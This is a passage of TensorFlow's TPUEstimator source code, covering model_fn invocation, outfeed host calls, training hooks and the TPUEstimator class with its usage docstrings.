def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
raise RuntimeError(
'estimator_spec used by TPU prediction must have type '
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
identity_fn = lambda **kwargs: kwargs
# TODO(xiejw): Adds validation for prediction dictionary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(tpu_estimator_spec.predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return predict_step, host_calls, captured_scaffold_fn
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
model_fn_args = util.fn_args(self._model_fn)
kwargs = {}
# Makes a deep copy of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
if isinstance(params, hparam.HParams):
params.add_hparam(_BATCH_SIZE_KEY, batch_size_for_model_fn)
else:
params[_BATCH_SIZE_KEY] = batch_size_for_model_fn
estimator_spec = self._model_fn(features=features, **kwargs)
if (self._ctx.is_running_on_cpu(is_export_mode) and
isinstance(estimator_spec, TPUEstimatorSpec)):
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
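# Illustrative sketch (feature key, layer size, and the `...` body are
# hypothetical, not part of this module): a user model_fn compatible with the
# kwargs assembled in `_call_model_fn` above. `params` is mandatory and
# carries the per-shard batch size; `labels`, `mode`, and `config` are passed
# only if they appear in the signature.
#
#   def my_model_fn(features, labels, mode, params):
#     batch_size = params['batch_size']  # per-shard batch size injected above
#     logits = tf.layers.dense(features['x'], units=10)
#     loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
#     ...  # build train_op / eval_metrics depending on `mode`
#     return tf.contrib.tpu.TPUEstimatorSpec(mode=mode, loss=loss, train_op=train_op)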
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, TPUEstimatorSpec):
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(err_msg.format('training_chief_hooks'))
if estimator_spec.training_hooks:
raise ValueError(err_msg.format('training_hooks'))
if estimator_spec.evaluation_hooks:
raise ValueError(err_msg.format('evaluation_hooks'))
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = util.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
return ret
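# Illustrative sketch (my_host_fn and the tensor names are hypothetical): the
# two host_call shapes accepted by `validate` and `create_cpu_hostcall` above.
# With the list/tuple form the number of tensors must match the function arity
# (unless the function takes *args); with the dict form tensors are matched by
# keyword.
#
#   host_call_as_list = (my_host_fn, [global_step_tensor, loss_tensor])
#   host_call_as_dict = (my_host_fn, {'global_step': global_step_tensor,
#                                     'loss': loss_tensor})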
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated tensors are passed to the host_fn,
which is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return []
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constrain it such that there is at most one outfeed dequeue and enqueue
# per replica.
tpu_device_placement_fn = self._ctx.tpu_device_placement_function
for i in xrange(self._ctx.num_replicas):
with ops.device(tpu_device_placement_fn(i)):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes, shapes=tensor_shapes)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos+len(self._tensors[name])]
pos += len(self._tensors[name])
# It is assumed evaluation always happens on a single-host TPU system. So,
# place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(core_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
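# Illustrative sketch (hypothetical metric_fn): the dequeued tensors are
# concatenated along dimension 0 across all replicas before reaching the host
# fn, so every tensor routed through eval_metrics/host_call must keep a batch
# dimension; a per-replica scalar such as a loss should be reshaped first.
#
#   loss_for_host_call = tf.reshape(loss, [1])   # shape [1], not a scalar
#   def metric_fn(labels, logits):               # sees tensors concatenated
#     predictions = tf.argmax(logits, 1)         # from all shards
#     return {'accuracy': tf.metrics.accuracy(labels=labels,
#                                             predictions=predictions)}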
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Count examples during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
examples_per_sec = self._batch_size * elapsed_steps / elapsed_time
if self._summary_writer is not None:
example_summary = Summary(value=[
Summary.Value(tag='examples_sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(example_summary, global_step)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify the
global batch size in the constructor, and then get the batch size for each
shard in `input_fn` and `model_fn` via `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` gets per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
prediction will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker).
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.accuracy(
labels=labels, predictions=predictions),
}
# Your model fn which runs on TPU (eval_metrics is a list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical systems. In addition, due to some
usability issues, for prediction with small datasets, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shut down the TPU system
properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`SavedModel` export support on TPU is not yet implemented. So,
`export_savedmodel` is executed on CPU, even if `use_tpu` is true.
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator`. For training, the
returned `EstimatorSpec` cannot have hooks as it is not supported in
`TPUEstimator`.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into an estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
config: A `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyperparameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
- TPU training and evaluation respect this bit.
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`.
Must be divisible by total number of replicas.
eval_batch_size: An int representing evaluation batch size.
Must be divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size.
Must be divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but exist in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _TPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.computation_shape):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Pass non-None params, as the wrapped model_fn expects them.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _TPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size,
eval_batch_size, predict_batch_size,
use_tpu)
self._is_input_fn_invoked = None
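# Illustrative sketch (my_model_fn, my_tpu_run_config, the tensors, and the
# batch sizes are hypothetical) of a typical training setup: train_batch_size
# is the global batch size, and the per-shard value surfaces as
# params['batch_size'] inside both input_fn and model_fn, as described in the
# class docstring above.
#
#   def train_input_fn(params):
#     batch_size = params['batch_size']
#     dataset = tf.data.Dataset.from_tensor_slices((images, labels))
#     return dataset.repeat().batch(batch_size)
#
#   estimator = tf.contrib.tpu.TPUEstimator(
#       model_fn=my_model_fn,
#       config=my_tpu_run_config,   # a tpu_config.RunConfig
#       use_tpu=True,
#       train_batch_size=1024,
#       eval_batch_size=1024)
#   estimator.train(train_input_fn, max_steps=10000)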
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
Either features or (features, labels) where features and labels are:
features - `Tensor` or dictionary of string feature name to `Tensor`.
labels - `Tensor` or dictionary of `Tensor` with labels.
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = util.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Set the batch size in params first. This helps the user keep the same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
if isinstance(kwargs['params'], hparam.HParams):
kwargs['params'].add_hparam(_BATCH_SIZE_KEY, batch_size_for_input_fn)
else:
kwargs['params'][_BATCH_SIZE_KEY] = batch_size_for_input_fn
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is a dict or a single Tensor, the
# dict keys, tensor shapes, and dtypes. The recorded structure is used to
# create the infeed dequeue ops, which must be wrapped and passed as a fn
# that is called inside the TPU computation, because the TPU computation
# itself is wrapped inside a tf.while_loop as well. So, we either pass
# input_fn to model_fn or pass dequeue_fn to model_fn. Here, `input_fn` is
# passed directly as `features` in the `model_fn` signature.
def _input_fn():
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has a stronger check. The parent class's check generates a confusing
warning message.
Args:
result: `features` returned by input_fn.
"""
pass
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
if mode != model_fn_lib.ModeKeys.PREDICT:
is_export_mode = False
else:
# For export_savedmodel, input_fn is never passed to Estimator. So, by
# checking the self._is_input_fn_invoked bit, we know that, given
# mode == PREDICT, this is the .predict API, not the export_savedmodel API.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
return model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
ExamplesPerSecondHook(ctx.global_batch_size,
output_dir=self.model_dir),
InstallSignalHandlerHook(),
training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': training.get_global_step()
},
every_n_secs=30)
] + input_hooks
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops()
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(total_loss,
math_ops.cast(
iterations_per_loop_var,
dtype=total_loss.dtype))
# Creates a dummy metric update_op for all metrics. Estimator expects
# all metrics in eval_metric_ops to have an update_op and calls them one
# by one. The real metric update_ops are invoked in a separate thread.
# So, here we give Estimator the dummy op for all metrics.
with ops.control_dependencies([mean_loss]):
# After the TPU evaluation computation is done (the mean_loss tensor),
# read all variables back from TPU and update the eval step
# counter properly.
internal_ops_to_run = _sync_variables_ops()
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
for k, v in host_call_ret['eval_metrics'].items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
dummy_predict_op, host_calls, scaffold = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops()
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In training and evaluation, the main TPU program is passed to the
# monitored training session to run. Infeed enqueue and outfeed dequeue
# are executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yields the elements (via a generator) to the call site. So,
# the outfeed-based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed-based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoids the issue of triggering
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions, message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = []  # Empty, we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(ctx, enqueue_ops,
host_ops),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_eval_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn))
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_eval_step, [_ZERO_LOSS])
(loss,) = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
